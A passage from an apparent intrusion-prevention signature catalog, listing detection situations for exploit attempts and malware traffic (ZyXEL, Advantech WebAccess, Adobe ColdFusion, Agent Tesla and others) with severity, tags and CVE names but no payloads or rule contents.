Vulnerability: ZyXEL-Privilege-Escalation-And-Information-Disclosure-CVE-2024-29976
Description:
Back to top

HTTP_CRL-ZyXEL-Remote-Code-Execution-CVE-2022-30525

About this situation: An attempt to exploit a vulnerability in multiple Zyxel firewall products detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: ZyXEL-Remote-Code-Execution-CVE-2022-30525
Description:
Back to top

HTTP_CRL-ZyXEL-Undocumented-User-Credentials-CVE-2020-29583

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: ZyXEL-Undocumented-User-Credentials-CVE-2020-29583
Description:
Back to top

HTTP_CRL_Apache-Airflow-Remote-Code-Execution-CVE-2020-11978

About this situation: An attempt to exploit a vulnerability in Apache Airflow detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Airflow, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1810-5242
Vulnerability: Apache-Airflow-Remote-Code-Execution-CVE-2020-11978
Description:
Back to top

HTTP_CRL_Belkin-N750-MiniHttpd-Buffer-Overflow

About this situation: An attempt to exploit a Belkin N750 MiniHttpd Buffer Overflow vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Belkin MiniHttpd, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: Belkin-N750-MiniHttpd-Buffer-Overflow
Description:
Back to top

HTTP_CRL_Bumat-rts-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Win32.Trojan.Bumat-rts-Botnet
Description:
Back to top

HTTP_CRL_Canon-Printer-Denial-Of-Service

About this situation: An attempt to exploit a Canon Printer Denial Of Service vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Canon, CVE2013, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: Canon-Printer-Denial-Of-Service
Description:
Back to top

HTTP_CRL_Centreon-SQL-And-Command-Injection

About this situation: An attempt to exploit a Centreon SQL And Command Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Centreon, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Centreon-SQL-And-Command-Injection
Description:
Back to top

HTTP_CRL_CryptKeeper.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Win32.ScareWare.CryptKeeper-Botnet
Description:
Back to top

HTTP_CRL_ElasticSearch-Dynamic-Scripting-Code-Execution

About this situation: An attempt to exploit an ElasticSearch Dynamic Scripting Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1554-5242
Vulnerability: ElasticSearch-Dynamic-Scripting-Code-Execution
Description:
Back to top

HTTP_CRL_Eupuds.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Win32.Trojan.Eupuds-Botnet
Description:
Back to top

HTTP_CRL_Foreign-Botnet-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-654-5211
Vulnerability: Foreign-Botnet
Description:
Back to top

HTTP_CRL_Heloag.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Win32.Backdoor.Heloag-Botnet
Description:
Back to top

HTTP_CRL_Horde-Unserialize-PHP-Code-Execution

About this situation: An attempt to exploit a Horde Unserialize PHP Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Horde, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: Horde-Unserialize-PHP-Code-Execution
Description:
Back to top

HTTP_CRL_Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245

About this situation: An attempt to exploit a vulnerability in Junos OS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Junos OS, Any Hardware, CVE2022, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245
Description:
Back to top

HTTP_CRL_MantisBT-Admin-SQL-Injection

About this situation: An attempt to exploit a MantisBT Admin SQL Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MantisBT, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: MantisBT-Admin-SQL-Injection
Description:
Back to top

HTTP_CRL_Movable-Type-Remote-Code-Execution

About this situation: An attempt to exploit a Movable Type Remote Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Movable Type, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Movable-Type-Remote-Code-Execution
Description:
Back to top

HTTP_CRL_Obfuscator.AJK-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Win32.Virus.Obfuscator.AJK-Botnet
Description:
Back to top

HTTP_CRL_Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Oracle-Business-Intelligence-Enterprise-Edition-CVE-2020-14864
Description:
Back to top

HTTP_CRL_Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218

About this situation: An attempt to exploit a vulnerability in Pulse Secure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2020, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218
Description:
Back to top

HTTP_CRL_Qakbot-Botnet-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: Qakbot-Botnet
Description:
Back to top

HTTP_CRL_Red-Hat-CloudForms-Management-Engine-Directory-Traversal

About this situation: An attempt to exploit a Red Hat CloudForms Management Engine Directory Traversal vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat CloudForms, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Red-Hat-CloudForms-Management-Engine-Directory-Traversal
Description:
Back to top

HTTP_CRL_SkyBlueCanvas-CMS-Command-Execution

About this situation: An attempt to exploit a SkyBlueCanvas CMS Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SkyBlueCanvas CMS, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: SkyBlueCanvas-CMS-Command-Execution
Description:
Back to top

HTTP_CRL_Sophos-Web-Appliance-Remote-Command-Execution

About this situation: An attempt to exploit a Sophos Web Appliance Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Web Appliance, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: Sophos-Web-Appliance-Remote-Command-Execution
Description:
Back to top

HTTP_CRL_Suspicious-Java-Serialized-Object

About this situation: A suspicious Java serialized object detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1668-5242
Vulnerability: Ysoserial-Generated-Java-Serialized-Object
Description:
Back to top

HTTP_CRL_Uranico.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Android.Trojan.Uranico-Botnet
Description:
Back to top

HTTP_CRL_VICIDIAL-Dialer-SQL-And-Command-Injection

About this situation: An attempt to exploit an ICIDIAL Dialer SQL And Command Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, VICIDIAL, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: VICIDIAL-Dialer-SQL-And-Command-Injection
Description:
Back to top

HTTP_CRL_VMTurbo-Operations-Manager-Remote-Command-Execution

About this situation: An attempt to exploit a VMTurbo Operations Manager Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMTurbo Operations Manager, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-698-5211
Vulnerability: VMTurbo-Operations-Manager-Remote-Command-Execution
Description:
Back to top

HTTP_CRL_ZoneMinder-Video-Server-Command-Execution

About this situation: An attempt to exploit a ZoneMinder Video Server Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ZoneMinder, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: ZoneMinder-Video-Server-Command-Execution
Description:
Back to top

HTTP_CS- Clipbucket-File-Upload-And-Command-Injection

About this situation: A Clipbucket File Upload And Command Injection Vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Clipbucket, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Clipbucket-File-Upload-And-Command-Injection
Description:
Back to top

HTTP_CS-180-Search-Assistant-Information-Disclosure

About this situation: 180 Search Assistant keyword based information disclosure for popup detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, 180 Search Assistant, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-506-5211
Vulnerability: 180-Search-Assistant
Description:
Back to top

HTTP_CS-3CX-Phone-System-VAD_Deploy.aspx-Arbitrary-File-Upload

About this situation: An attempt to exploit a 3CX Phone System VAD_Deploy.aspx Arbitrary File Upload vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, 3CX Phone System, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-838-5242
Vulnerability: 3CX-Phone-System-VAD_Deploy.aspx-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Accellion-FTA-statecode-Cookie-Remote-File-Disclosure

About this situation: An attempt to exploit an Accellion FTA statecode Cookie Remote File Disclosure vulnerability detected.
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Accellion, CVE2015, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: Accellion-FTA-statecode-Cookie-Remote-File-Disclosure
Description:
Back to top

HTTP_CS-Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Mautic detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mautic, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Acquia-Mautic-Tracking-Pixel-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Admbook-Php-Code-Execution

About this situation: Detects Admbook Php Code Execution Exploits
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Admbook, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Admbook-Php-Code-Execution
Description:
Back to top

HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1169-5242
Vulnerability: Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1279-5242
Vulnerability: Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second
Description:
Back to top

HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1732-5242
Vulnerability: Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload
Adobe-ColdFusion-Ckeditor-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1279-5242
Vulnerability: Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal
Description:
Back to top

HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102

About this situation: An attempt to exploit a vulnerability in Adobe Commerce detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Commerce, Adobe Magento Open Source, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102
Description:
Back to top

HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Adobe Commerce detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Commerce, Adobe Magento Open Source, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Adobe-RoboHelp-Server-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Adobe Systems RoboHelp Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Systems RoboHelp Server, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-507-5211
Vulnerability: Adobe-RoboHelp-Server-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Adobe-RoboHelp-Server-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Adobe Systems RoboHelp Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems RoboHelp Server, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Adobe-RoboHelp-Server-Filename-Directory-Traversal
Description:
Back to top

HTTP_CS-Advantech-Iview-CVE-2022-2138-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Advantech-Iview-CVE-2022-2138-Denial-Of-Service
Description:
Back to top

HTTP_CS-Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1279-5242
Last changed: sgpkg-ips-1279-5242
Vulnerability: Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess/NMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1288-5242
Vulnerability: Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess NMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1291-5242
Vulnerability: Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1276-5242
Vulnerability: Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1294-5242
Vulnerability: Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal
Description:
Back to top

HTTP_CS-Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1050-5242
Vulnerability: Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS RMM detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Adware-Tickerbar

About this situation: Adware TickerBar traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Adware-Tickerbar
Description:
Back to top

HTTP_CS-Agent-Tesla-Malware-Infection-Traffic

About this situation: Agent Tesla malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Agent-Tesla-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-Agent-Tesla-Panel-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Agent Tesla detected.
Context: HTTP Client Stream
Severity: 7
